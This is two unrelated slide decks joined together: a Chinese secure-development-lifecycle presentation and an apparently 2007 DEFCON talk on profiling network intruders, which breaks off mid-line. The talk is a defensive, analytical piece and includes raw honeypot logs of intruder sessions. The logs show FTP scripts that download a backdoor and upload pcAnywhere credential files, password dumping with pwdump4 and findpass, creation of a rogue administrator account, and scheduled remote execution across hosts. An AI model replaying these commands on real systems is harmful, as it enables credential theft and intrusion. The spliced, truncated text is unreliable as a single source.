Secure SofwareDevelopment LifeCycle 为您构架安全的业务系统 企业最佳安全实践 系统安全 网络安全 应用安全 1990-2017 2002-2017 2006-2017 网络攻击的方向 木桶原理 安全攻击,最薄弱环节的攻击; 安全问题,最薄弱环节的集群式爆发; 最薄弱环节的攻击 没有考虑安全设计的业务系统,理论上安全风险较高; 没有经过长时间考验的业务系统,实际安全风险较高; 没有经过验证的业务逻辑,带来的新形式的攻击较多。 最新业务的攻击 漏洞 防御 体系 威胁 防御 体系 漏洞防御体系 依照漏洞思维来建立的防御系统: 1、既有漏洞的安全经验; 2、测试发现的漏洞情况; 优势:简单、快速、高效; 劣势:不够全面、攻击样板点需要足够、未知风险较高 现状:目前互联网主流模式,大量SRC起来的原因都在此 威胁防御体系 通过建立威胁模型,来充分发现软件产品中的威胁,在设 计、开发、测试、运维等各个角度来削减威胁,最后达到 一个动态的平衡。 优势:系统、全面、成本可控; 劣势:体系建设需要一个周期,全员质量 现状:目前行业仅TOP 100强开始超这个思路建设 软件安全建设思路 安全防御体系 增加攻击成本 网络安全 降低安全风险 敏捷开发环境,特别在DevOps模式下,留给 安全测试人员的时间非常有限,无法充分发现 安全问题; 敏捷开发模式下安全测试 01 在开发环境中,安全人员数量有限,多项目并 行交付、上线过程中,无法进行充分的安全测 试; 多项目并行环境 02 目前软件开发过程中,会引入大量的第三方组 件,第三方组件的安全问题爆发,会导致整个 产品的安全问题; 第三方代码带来的安全问题 03 在线系统出现问题后,如何快速解决以及溯源 应急响应机制 04 面临 挑战 软件安全开发生命周期,主要目的是通 过系统的体系,帮助软件开发厂商在需 求、设计、开发、测试、部署上线等各 个阶段降低安全风险,提升安全能力。 安全设计 设计 安全测试 测试 安全需求 需求 安全开发 开发 S-SDLC 软件安全开发生命周期 部署 上线 安全风险 Security Risk Network Application Mobile Cloud IoT Mobile TOP 10 Risk M1-平台使用不当 M2-不安全的数据存储 M3-不安全的通信 M4-不安全的身份验证 M5-加密不足 M6-不安全的授权 M7-客户端代码质量问题 M8-代码篡改 M9-逆向工程 M10-无关的功能 OWASP TOP 10 A1 - 注入 A2 -失效的身份认证和会话管理 A3 -跨站脚本( XSS) A4 - 不安全的直接对象引用 A5 -安全配置错误 A6 -敏感信息泄漏 A7 - 功能级访问控制缺失 A8 -跨站请求伪造 ( CSRF) A9 - 使用含有已知漏洞的组件 A10 - 未验证的重定向和转发 IoT TOP 10 I1 - 不安全的Web界面 I2 -不完备的认证授权机制 I3 -不安全的网络服务 I4 - 缺乏传输加密 I5 -隐私处理存在问题 I6 -不安全的云环境 I7 -不安全的移动设备环境 I8 -不完备的安全配置 I9 -不安全的软件、固件 I10 -薄弱的物理安全保护 100%的IoT设备接受123456这样的弱密码 100%的IoT设备没有闭锁机制 100%的IoT设备有枚举风险 70%的IoT设备的SSH通道有root帐号权限 60%的IoT设备的web页面有XSS和SQL injection问题 70%的IoT设备没有加密机制 80%的IoT设备收集用户个人信息 90%的IoT设备没有多重认证机制 90%的IoT设备的软件升级过程有安全漏洞 安全风险导致问题 IoT全球DDOS攻击案例 安全风险削减过程 Security Risk Reduction 威胁 分析 安全 设计 安全 开发 安全 测试 安全 部署 建立安全开发体系 S-SDLC 需求 设计 开发 测试 部署和 运维 - 风险评估 - 威胁建模 - 设计审核 - 攻击面分析 - 安全开发 - 代码审核 - 安全测试 - 渗透测试 - 安全加固 - 补丁管理 - 漏洞管理 - 安全事件响应 - 风险评估模板 - 威胁库 - 设计审核模板 - 公共安全组件 - 静态分析工具 - 动态分析工具 - 第三方渗透测 试 - 安全基线 - 扫描、监控、 管理工具 培训、政策、组织能力 敏捷开发模式 S-SDLC • 环境初始 化 • 威胁建模 • 安全开发 • 持续集成 • 自动化部署 • 安全运维 • 持续测试 • 更新设计 • 代码审核 • 渗透测试 设计 开发 测试 部署 THANKS www.seczone.cn 4000-983-183
Copyright ©2007 Savid Technologies, Inc. All Rights Reserved DEFCON 15 Analyzing Intrusions & Intruders A Deeper look at a psychological approach towards network analysis Sean M. Bodmer Savid Technologies, Inc. sbodmer@savidtech.com Copyright ©2007 Savid Technologies, Inc. All Rights Reserved !!Updated Presentation!! » This slide deck is different from your CD » I will provide an updated brief to DEFCON for further review » Thanks in advance! Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Introductions » Who am I? – Sean M. Bodmer • Savid Technologies, Inc. • Honeynet Researcher & Intrusion Analyst • Information Security/Criminal Sciences Researcher • Over a decade working in Information Security – Not an expert Behavioral Profiler! • A Intrusion Analyst by trade • Studies signatures and observables of Intrusions • Building a thesis on Attacker/Threat Profiling Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Why am I here? » To enable you to walk away with alternative concepts and methods to better perform intrusion analysis and attacker characterization of cyber crimes and cyber criminals Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Everyone's Challenge » What can you do as a Security Professional to protect your assets and better understand threats? » How do you learn from attackers and threats? » How can you use this to properly analyze the motives, intent, and behaviors? » How can you prevent further attacks and generate stronger protections? » How do you effectively communicate your findings to senior leadership? Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Overall Foundations » Behavioral Profiling –– Generally profiling has negative connotations, but this is the l Generally profiling has negative connotations, but this is the literal iteral term term… … –– Assumptions of Profiling Assumptions of Profiling • The rational relies on the uniqueness of experience & different personality types will be reflected in lifestyles & behaviors. This leads to assumptions about profiling: – The intrusion reflects the personality – The methods remain similar – The signature remains the same – The personality will not change – Analyzes the pattern of Individuals and Groups • Focus on Behavior • Skills and Abilities • Accessibility to/use of Resources • Motivation • Complexity – Needs a multi-disciplinary approach – Simply being an Profiler or Network Geek won’t get you thye complete picture Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study A » 1888 A.D. - Jack The Ripper – Unidentified Serial Killer – Whitechapel, United Kingdom – Mutilated 5 Prostitutes » First case Profiling was actively utilized – At that time the concepts of criminal profiling, fingerprinting, and other such knowledge and intelligence that have developer were poorly understood if not altogether unknown Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study A » Modus Operandi (MO) » Patterns and Signatures – Victim Type - prostitutes, mid age. – Areas - Dark secluded streets of Whitechapel, in London's East End (exception Marie Kelly). – Murder - throat cut from left to right, victim mutilated. – Victim After Murder - body not concealed or moved, body organs missing (cannibalism/fetishism?) Victim Date Circumstances of Death Mutilations Mary Nicholls 31 Aug 1888 killed where found; no shout/cry(sho) abdomen slashed Annie Chapman 8 Sep 1888 no signs of struggle(str) disembowelled; uterus missing Elizabeth Stride 30 Sep 1888 throat cut on ground; no str; no sho no mutilation Catherine Eddowes 30 Sep 1888 throat cut on ground; no sho abdomen laid open; kid, uter missing Marie Kelly 9 Nov 1888 killed lying on bed, no str extensive body mutilation Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study A » Suspects – A Royal Plot - This theory was by author Stephen Knight who talked to some grandson who said that his painter dad knew of a Royal duke who had a baby by a prostitute (who posed for the painter). So the Queen inscribed the help of her doctor and Freemasons (Lord Salisbury and Sir William Gull) who then killed the prostitute friends with each Jack the Ripper murder. – Doctors - Did Jack the Ripper need medical knowledge to kill his victims? Some doctor's said he did and some said he did not. Here are some comments from doctors who carried out autopsies on Jack's victims – • Mary Nicholls - 'Deftly and skillfully performed.' - Dr Llewellyn. • Annie Chapman - 'Obviously the work was that of an expert - or one, at least, who had such knowledge of anatomical or pathological examinations as to be enabled to secure the pelvic organs with one sweep of the knife.' - Dr Phillips. • Catherine Eddowes - 'A good deal of knowledge as to the position of the organs in the abdominal cavity.' - Dr Brown. • Catherine Eddowes - 'No stranger to the knife.' - Dr Sequiera. • Marie Kelly - 'No scientific or anatomical knowledge.' - Dr Bond. Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study A » Jack the Ripper's crimes were disorganized – Murder usually happens spur of the moment (with no planning but the one simple objective to kill) – Does not bring any tools ('rape kit') to the kill except maybe murder device – No contact with the victim prior to spur of the moment murder – No rape, torture etc. will take place before murder – Kills victim but does not care for evidence usually left at the crime scene (high degree of violence takes place at murder) – Will not move body in an attempt to hide, bury it etc., unconcerned of its discovery – Killer might be involved further with the dead victim (mutilation, necrophilia, cannibalism, etc) and may also take souvenir » Organization in an Intrusion provides an observable signature… – Knowledge of the Environment/Terrain – Extremely Skilled with Tools and Operating Systems Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study A » Basic Profile of Jack – Jack would probably of grown up in a poor household, where the fathers work was unstable and where he experienced harsh discipline – The family could of also been subject to sexual abuse, alcohol or drug problems, mental illness etc – Jack would of been a shy quiet type as he had internalized the painful emotions at home – He would also have a poor self image with a disability or physical ailment, casting him from society and making him feel very inadequate – He would also be an underachiever and would probably have a menial job in the industrial sector – Jack would of been unable to live or socialize with other people, leading a very lonely life, the only people he would live with would be his parents or on his own – He would also have no relationships so his hate and anger would be aimed at the opposite of sex, but no rape, as he was very incapable – Jack's mental illness would have played a big part on the murder and mutilation of his victims – He would also take little to no interest in the murder after it was committed so he would of never sent any letters (the media did) – Jack's motive was of course : sex, dominance, and power – Jack was also a stable killer - a person who murders in the same basic area, so this means that it was quite definite that he lived right in Whitechapel in 1888. (Profile made up from notes of classification from the book - 'Whoever Fights Monsters' By Robert K. Ressler and Tom Shachtman) Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Leveraging Capabilities » There is over 100 years of experience from the Law Enforcement Community that you can leverage to better understand threats and the motivations of attackers » That experience is key to understanding threats and increasing awareness… » Information Systems are now at a point to enable human analytical capabilities to move beyond simple network analysis and post-mortem analysis » How do you know what implementation is best for you? – Recursive Learning Systems? – Automated Signature Generation Systems? – Managed Security Services? – On-Site Contractors? Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Getting Scientific » Criminal Investigative Analysis – Review Crimes from a behavioral, investigative, and forensic perspective – Reviewing and assessing the facts of the criminal act – Interpreting offender behavior and interaction with the victim systems as exhibited during the crime or displayed in the crime scene » A person’s basic behavior, exhibited in a crime scene, will also be present in that person’s lifestyle – That is what helps determine the type of person you are looking for Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Getting Technical » Threat Analysis/Modeling – Common Components • Potential Attacks/Threats/Risks • Analysis • Countermeasures • Future Preparations » Common Analysis Approach: – Locate key system vulnerabilities – Classify possible attackers – Identify goals of attacker – Enumerate possible ways to achieve goals – Create resolution plan Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Two Worlds Collide… » Relying solely on and Post-Mortem analysis does not work in an age of “All Things Cyber” » It is possible to take a deeper look at the behaviors and personalities of “who” is attacking your infrastructure » Now we need to understand the “who” and “why” to prevent further attacks » Behavioral Profiling defines how security professional can better understand the motivations and methods of attackers Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Two Worlds have Collided » Principals of combined profiling and threat analysis: – Profiling of individuals for the purposes of identification and possible apprehension – Collection and analysis of data into models that allow better theoretical understanding of threats – Utilize research to assist in calculating motives and behaviors in specific attacks by groups/individuals – Utilize research to create models of threats that involve variables such as to illustrate to stakeholders probable next targets of threats – To understand where the community is going next or may have been previously Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Now you can be a Columbo! Copyright ©2007 Savid Technologies, Inc. All Rights Reserved One more thing… » Types of Investigations – Inductive • Qualitative analysis lifecycle • Relies on guesswork and assumptions • Not recommended for professional investigations – Deductive • Quantitative analysis lifecycle • Relies on evidence and hard facts • Capable of leveraging over a century of information • Highly recommended for professional intrusion analysts Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Oh, just one more thing! » Cyber Crime Scene Investigations – Assess Scene • Document all Observables – Collect Evidence • Document, Label, and Store all Evidence for analysis – Collect Data Sources • Communicate with Data Handlers/Managers • Document all Sources – Analyze • Network Forensics – Document all Observables • Host Forensics – Document all Observables – Assessment • Generate Attacker Profile – Document all Modus Operandi – Define all Signatures of Specifics/Modus Operandi – Report • Generate Intrusion Report – Technical – Observables – Threat Profile Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study B » “HotterthanMojaveinmyheart” AKA “El Griton,” Julio Ardita – Hacked into NASA, DoD, U.S. colleges, and colleges in Korea, Mexico, Taiwan, Chile and Brazil – Hacked into the private telephone systems of companies in his native Argentina, dialed into Harvard U’s computer system, and launched his U.S. hacking attacks through Harvard. – Caught: USN San Diego detected that certain system files had been altered - they uncovered a sniffer file and a file that contained the passwords he was logging, and programs to gain root access and to cover tracks. Argentine officials arrested him for hacking into telephone company facilities, seized his computers. – $15K telephone service theft, millions in damaged files and investigative costs yielded a $5k fine and 3 years of probation. Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Thinking about Assessments? » If you were an Analyst on this event – How would you have analyzed the events? • Would you consider the difficulty? • Would you consider the target? • Would you consider the outcome? – How would one analyze this threat? • Typology • Victimology • Other methods Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Attacker Characterization » Attack Characterization can has two primary components: – Events – What has occurred by act of the attacker – Threats – The motives, and intent of the attack » Characterizing an attacker will rely on analyzing what you can see over the network – Generally session data isn’t available through production resources – Web servers retain session logs, which can contain keystroke logs – Host security programs can be purchased that record user activity and session information – Intrusion Detection systems are available that monitor session activity – Honeynet technologies are available which configured properly can be deployed to monitor session level interactions Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Attacker Characterization » Common Attacker Types: – Naïve Novice (hacker) – Advanced Novice (hacker) – Professional or Dedicated Hacker – Disgruntled Employee (insider) – Corporate Espionage (Professional Hacker) – Organized Crime – Hacker Coalition – Zealot Organization – Cyber Terrorist – Nation State actor – Foreign Intelligence Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Attacker Characterization » Components of an Attacker Profile – Motivation – the level of intensity and degree of focus – Objectives - boasting rights, disruption, destruction, learn secrets, make money – Timeliness - how quickly they work (years, months, days, hours) – Resources - well funded to unfunded – Risk Tolerance – high (don’t care) to low (never want to be caught) – Skills and Methods - how sophisticated are the exploits (scripting to hardware lifecycle attacks) – Actions - well rehearsed, ad hoc, random, controlled v. uncontrolled – Attack Origination Points – outside, inside, single point, diverse points – Numbers Involved in Attack - solo, small group, big group – Knowledge Source - chat groups, web, oral, insider knowledge, espionage Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Challenges in Attack Characterization » Cost – Personnel (Skilled Talent) – Equipment – Software – Productivity versus Business Operations » Technology – Most security budgets only focus on standard components • Network sensing equipment • Boundary protection devices • Continuity of Operations (COOP) • Disaster Recovery » Legal – Most organizations are nervous to deploy attacker analysis systems that could be considered capable of “Profiling” – Most do not understand the true legal nature of defensive analysis technologies Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Being the Analyst » Identifying the points of injection (source point) – Tracing an attack or insertion point back to the source to learn: • How • What • When • Why • Where – Acquiring all of the internal assets to perform analysis • Some systems are out of bounds for analysis – Either you do not own or you are not allowed to analyze • Some logs could have been destroyed or corrupted during the incident – Post Mortem is reactive and not pro-active • You don’t learn as much while attempting to remediate your incident and return your network to normal operating levels Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study C » “Datastream Cowboy” and “Kuji” attack USAF’s Rome Labs – 26 days of attacks; 20 days of monitoring – 7 sniffers, over 150 intrusions from 10 points of origin from 8 different countries – Priceless cost to national security, but $211,722 to undo damage to computer systems. • Investigative costs also not included Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Thinking about Assessments? » If you were an Analyst on this event – How would you have analyzed the events? • Would you consider the difficulty? • Would you consider the target? • Would you consider the outcome? – How would one analyze this threat? • Typology • Victimology • Other methods Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Constructing Attacker Profiles » What is a profile? – As complete a description of the individual who committed the crime as possible…based on the crime scene and the crime itself » Intruder Profiles can include: – Gender • Content Analysis • Research? – Age • Command Use / Key Stroke • Typology • Methodology • Content Analysis – Race/ethnicity • Command Use / Key Stroke • Methodology • Content Analysis Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Constructing Attacker Profiles (cont’d) » What is a profile? – As complete a description of the individual who committed the crime as possible…based on the crime scene and the crime itself » Intruder Profiles can include: (continued) – Level of intelligence/schooling • Command Use / Key Stroke • Methodology • Content Analysis • Remote Assessment (Clinical Expertise…) – Political Affiliations • Command Use/ Key Stroke • Content Analysis • External (Public) Data Sources – Physical/Mental Health • Command Use/ Key Stroke • Content Analysis • Observables Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Constructing Assessments » Triage – Validation/Threat Assessment » Case Overview – Victimology • History/”Hotspots” • Nature of Information Targeted • Victim System Functionality – Attack • Vulnerability/Exploit – Disclosure History • MO, Signature, Content, Patterns • Tools • Utilization of Access • Data Transfer Technique • Logging Alteration/Deletion Technique Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analyzing Session Behaviors » If session data is available an enormous amount of observed information can be gained from the attacker – Knowledge of your environment • System Locations • System Functionality • Folder & File Locations • Personnel & Roles – Knowledge of the Operating System – Grasp of commands, options, and arguments – Organized or Disorganized • This is helps build a clear picture of the intent and motive – Whether the attack is scripted or not – How often does the attacker generate typos? • Could that be a signature? Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Implementing Session Analysis » The following sessions were live captures of attackers through the use of honeynet technologies laced within production networks » This information was used to better understand an attacker and increase the protection of the networks surrounding these sensors… – This information has been approved by the host of the network and scrubbed to protect the source of the customer Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 1 » 'ipconfig'); » 'ping www.pivot.net'); » 'ipconfig /all'); » 'net view'); » 'ping -a press1a-exch1'); » 'time'); » 'net user'); » 'net view /domain'); » 'net view /domain:press1a'); » 'net view /domain:workgroup'); » 'dir c:\'); » 'dir d:\'); » 'dir ncts80.exe'); » 'dir tftp*.*'); » 'dir ftp.exe'); » 'ipconfig'); » 'echo ftp>f.txt'); » 'dir f.txt'); » 'echo IUSER_DB>>f.txt'); » 'echo muahaha>>f.txt'); » 'echo binary>>f.txt'); » 'echo get ncts80.exe>>f.txt'); » 'echo bye>>f.txt'); » 'type f.txt'); » 'ftp -s f.txt'); » 'ftp -s:f.txt'); » 'del f.txt'); » 'echo open>f.txt'); » 'echo IUSER_DB>>f.txt'); » 'echo muahaha>>f.txt'); » 'echo binary>>f.txt'); » 'echo get ncts80.exe>>f.txt'); » 'echo bye>>f.txt'); » 'type f.txt'); » 'ftp -s:f.txt'); » 'dir ncts80.exe'); » 'ncts80.exe'); » 'dir ncts80.exe'); » 'netstat -an'); » 'ftp -s:f.txt'); » 'dir ncts80.exe'); » 'ren ncts80.exe winsec.exe'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 1 » 'ping -a'); » 'net name'); » 'net start'); » 'dir c:\*.cif /s'); » 'copy c:\docume~1\alluse~1\applic~1\symantec\pcanyw~1\*.cif'); » 'ren winnt.~1,cif 1.cif'); » 'ren winnt.~1.cif 1.cif'); » 'ren winntn~1.cif 1.cif'); » 'dir 1.cif'); » 'copy c:\docume~1\alluse~1\applic~1\symantec\pcanyw~1\*.cif'); » 'ren winnt.~1,cif 1.cif'); » 'ren winnt.~1.cif 1.cif'); » 'ren winntn~1.cif 1.cif'); » 'dir 1.cif'); » 'ren winntn~1.cif 2.cif'); » 'ren winntn~2.cif 2.cif'); » 'dir *.cif'); » 'echo open>a.txt'); » 'del f.txt'); » 'echo IUSER_DB>>a.txt'); » 'echo muahaha>>a.txt'); » 'echo binary>>a.txt'); » 'echo put 1.cif>>a.txt'); » 'echo put 2.cif>>a.txt'); » 'echo get fport.exe>>a.txt'); » 'echo get pwdump4.exe >>a.txt'); » 'echo get lsaext.dll >>a.txt'); » 'echo get findpass.exe>>a.txt'); » 'echo get pskill.exe>>a.txt'); » 'echo get pulist.exe>>a.txt'); » 'echo bye>>a.txt'); » 'type a.txt'); » 'ftp -s:a.txt-'); » 'del a.txt'); » 'fport'); » 'pwdump4 /l'); » 'pulist'); » 'findpass sophie administrator 320'); » 'findpass'); » 'findpass press1a administrator 320'); » 'dir c:\'); » 'dir ncts80.exe'); » 'dir ncts80.exe'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 1 » 'dir findpass.exe'); » 'net view'); » 'ping -a arcane'); » 'netstat -an'); » 'ping -a'); » 'ping -a'); » 'net share'); » 'net view \\zeta'); » 'net view \\arcane'); » 'dir \\arcane\winstall'); » 'dir \\arcane\d'); » 'dir \\arcane\clients'); » 'dir \\arcane\c'); » 'dir ncts80.exe'); » 'at \\arcane'); » 'copy winsec.exe \\arcane\d\winnt\system32'); » 'dir \\arcane\admin$\system32'); » 'net time \\arcane'); » 'dir c:\'); » 'net time \\arcane'); » 'dir \\arcane\admin$\system32\winsec.exe'); » 'copy winsec.exe \\arcane\admin$\system32\winsec.exe'); » 'dir \\arcane\admin$\system32\winsec.exe'); » 'at \\arcane 10:55pm winsec.exe'); » 'net time \\arcane'); » 'net time \\zeta'); » 'net view \\zeta'); » 'at \\zeta'); » 'dir \\zeta\c$'); » 'copy winsec.exe \\zeta\admin$\system32'); » 'at \\zeta 10:55pm winsec.exe'); » 'at \\press1a-exch1'); » 'dir \\press1a\c$'); » 'copy winsec.exe \\press1a-exch1\admin$\system32'); » 'net time \\press1a-exch1'); » 'at \\press1a-exch1 11:12pm winsec.exe'); » 'at \\press1a-exch1'); » 'at \\arcane'); » 'at \\zeta'); » 'dir \\zeta\admin$\system32\winsec.exe'); » 'dir \\arcane\admin$\system32\winsec.exe'); » 'dir cmd.exe'); » 'ping -a press1a-exch1'); » 'echo open>a.txt'); » 'echo IUSER_db>>a.txt'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analyzing Session Behavior » How would you evaluate this attack? – Sophisticated? – Motivated? – Targeted or Opportunistic? – Organized or Disorganized? – Automated or Live ? Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 2 » 'ipconfig'); » 'ping'); » 'net use'); » 'net use /?'); » 'exit'); » 'command.com'); » 'findpass'); » 'findpass win2kpro administrator 192'); » 'net user'); » 'net user rt rt /add'); » 'net localgroup administrators rt /add'); » 'exit'); » 'dir /S sebek.sys'); » 'ping -c 1'); » 'ping -n 1 192.168.2'); » 'ping -n 1'); » 'ping -n 1'); » 'ping -n 1'); » 'ping -n 1'); » 'arpm -a'); » 'arp -a\'); » 'arp -a'); » ' 00-0c-29-80-9e-2e dynamic '); » ' 00-0c-29-63-e3-5f dynamic '); » ' 00-0c-29-e6-b3-f6 dynamic '); » ' 00-0c-29-6a-6b-71 dynamic '); » 'ping -n 1'); » 'arp -a'); » 'ping -n 1'); » 'ping -n 1'); » 'ping -n 1'); » 'ping -n 1'); » 'ping -n 1'); » 'arp -a'); » 'arp -a'); » 'ping -n 1'); » 'arp -a'); » 'ipconfig /all'); » 'net start'); » 'net use'); » 'cd \\.host'); » 'exit'); » 'net use'); » 'net share'); » 'net use k: \\.host '); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 2 » 'k:'); » 'cd \'); » 'dir'); » 'findpass'); » 'findpass win2kpro administrator 192'); » 'dir'); » 'cd progr*'); » 'dir'); » 'cd vmware'); » 'dir'); » 'cd vmware*'); » 'dir'); » 'type hook.dll | more'); » 'dir /S *.sys'); » 'cd \'); » 'dir'); » 'cd doc*'); » 'dir'); » 'cd iwar*'); » 'dir'); » 'cd desk*'); » 'dir'); » 'cd ..'); » 'dir'); » 'cd my*'); » 'dir'); » 'cd ..\..'); » 'dir'); » 'cd administrator'); » 'dir'); » 'cd desktop'); » 'dir'); » 'cd ..'); » 'cd ..'); » 'dir'); » 'cd administrator'); » 'dir'); » 'cd my*'); » 'dir'); » 'cd '); » 'cd \'); » 'net view'); » 'net view \\win2ks'); » 'net view \\.host'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 2 » 'net view \\win2kpro'); » 'at'); » 'net service'); » 'net start'); » 'exit'); » 'exit'); » 'ipconfig'); » 'net user'); » 'net view'); » 'net view /domain'); » 'net view /domain:sp'); » 'net view /domain:domingo'); » 'net group "Domain Users"'); » 'net use'); » 'netstat -t tcp -an'); » 'netstat -p tcp -an'); » 'net start'); » 'cd \'); » 'mkdir tools'); » 'attrib +h tools'); » 'cd tools'); » 'a'); » 'a'); » 'a'); » 'a'); » 'a'); » 'cd tools'); » 'cd c:\tools'); » 'dir'); » 'type a'); » 'a'); » 'a'); » 'a'); » 'more a'); » 'ftp -s:a'); » 'ftp -s:a'); » 'type a'); » 'net use'); » 'net share'); » 'nmap'); » 'nmap -sS -sV -O -p 0-65535 -oN one_scan'); » 'nmap -sT -sV -O -p 0-65535 -oN one_scan'); » 'sl'); » 'sl -t 21,22,25,42,53,135,137,139,443,445,1433,3306,6000 -z'); » 'for /L %i in {1,1,254} DO ping -n 1 192.168.1.%i'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analyzing Session Behavior » How would you evaluate this attack? – Sophisticated? – Motivated? – Targeted or Opportunistic? – Organized or Disorganized? – Automated or Live? Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 3 » 'net view /domain:3DES'); » 'net view /domain:DRS'); » 'cd \'); » 'netdom query'); » 'dir'); » 'netdom /?'); » 'netdom'); » 'cd Doc*'); » 'dir'); » 'cd IW*'); » 'dir'); » 'cd De*'); » 'ddir'); » '-Rq'); » 'cd ..'); » 'cd ..'); » 'cd ..'); » 'dir /s *.doc'); » 'dir /s *.xls'); » 'dir /s *.ppt'); » 'dir'); » 'del netdom.exe'); » 'exit'); » 'ipconfig'); » 'netdom'); » 'ping'); » 'arp -a'); » 'ping -a'); » 'ping-n 1 -a'); » 'ping -n 1 eyh8cPKl`a$YSPTVQc^5-&g1-a'); » 'net use * \\\c$ /u:\Administrator s4t4n!!'); » 'net use'); » 'net use /?'); » 'net use * \\\c$ /u:\Administrator'); » 'ping'); » 'set '); » 'net use \\'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Session Capture 3 » 'ping -n 1 mssql'); » 'net use * \\\c$ s4t4n!! /u:\Administrator'); » 'net view'); » 'set'); » 'net user rt rt /add'); » 'net localgroup administrators rt /add'); » 'net user'); » 'net view /domain'); » 'net view /domain:DRS'); » 'net view /domain:AR'qMgGFN2.:0i-Q3nDA'); » 'net view /domain:workgroup'); » 'netstat -an'); » 'ipconfig'); » 'arp -a'); » 'net users'); » 'global'); » 'global "Domain Users"'); » 'global Administrators \\MSSQL'); » 'net view /domain'); » 'global "Domain Users" 3DES'); Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analyzing Session Behavior » How would you evaluate this attack? – Sophisticated? – Motivated? – Targeted or Opportunistic? – Organized or Disorganized? – Automated or Live? Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Case Study D – Carlos “SMAK” Salgado • Hacked several companies doing business on the WWW, including an ISP, gained unauthorized access, and harvested tens of thousands of credit card records. • Two of the companies involved had no knowledge of being hacked until they were contacted by the FBI • SMAK made about $200k from the sale of credit card information to other criminals, who in turn inflicted $10 million in damage upon the consuming public. • SMAK pleaded guilty on four of the five counts, and received 2 1/2 years in federal prison and five years of probation. Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Thinking about Assessments? » If you were an Analyst on this event – How would you have analyzed the events? • Would you consider the difficulty? • Would you consider the target? • Would you consider the outcome? – How would one analyze this threat? • Typology • Victimology • Other methods Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Supporting Technologies » I can’t go cover all this theory without some tools… » Intrusion Analysis Data Sources – NIDS/HIDS – Network Security Systems • Firewalls • Anti-Virus • Routers – Honeynet Technologies – Digital Media Forensics – Systems Event Logs Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeynet Technologies » In order to catch someone crafty you need to be crafty » Honeypots and Honeynets – A security resource who’s value lies in being probed, attacked or compromised – Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise – The desire is to be replicas or appear as production network resources – A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. – Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise. – Primary value to most organizations is information and deception. Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypots » Advantages – Collect small data sets of high value. – Reduce false positives – Catch new attacks, false negatives – Work in encrypted or IPv6 environments – Simple concept requiring minimal resources » Disadvantages – Limited field of view (microscope) • You can’t rely solely on honeynet technologies – Risk (mainly high-interaction honeypots) • They require a large amount of analysis • Automation is not perfect if operating on a limited budget Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Honeypot Types » Many Types Available – http://www.honeynet.org – High Interaction - Does not scale well • Resources • Machines • Data Analysis – Low Interaction - Can scale • Specific Purpose • Strategic Deployment Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analysis Capabilities Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analysis Capabilities Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analysis Capabilities Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Analysis Capabilities Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Jedi Mind Tricks! » Spend more time analyzing attacks » Spend more time performing analysis » Perform Victimology and Typology for each incident and affected system » Build a profile of the Incident, you may see cross-over with approaches and methods against multiple events » Use the lessons learned to add stronger policy and countermeasures Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Thinking like a Analyst » Professional Recommendations – Create photos • You can save a lot of time on documentation by attaching photos to the case (operational environment, storage, etc.) – You cannot decide to create a chain-of-custody if you have already performed any of these steps • Think before you act – If you are working a prosecutable intrusion, ask for an attorney to help you formulate a plan of approach – Always describe every possible detail in the reports • You never know what will be important later • You never know what clue will lead to the “needle” – Take more time to study non-cyber based criminal case studies • You can relate to how signatures were identified • Learn more about Criminal Sciences • Document every detail, no matter how minute, it may be a clue for later Copyright ©2007 Savid Technologies, Inc. All 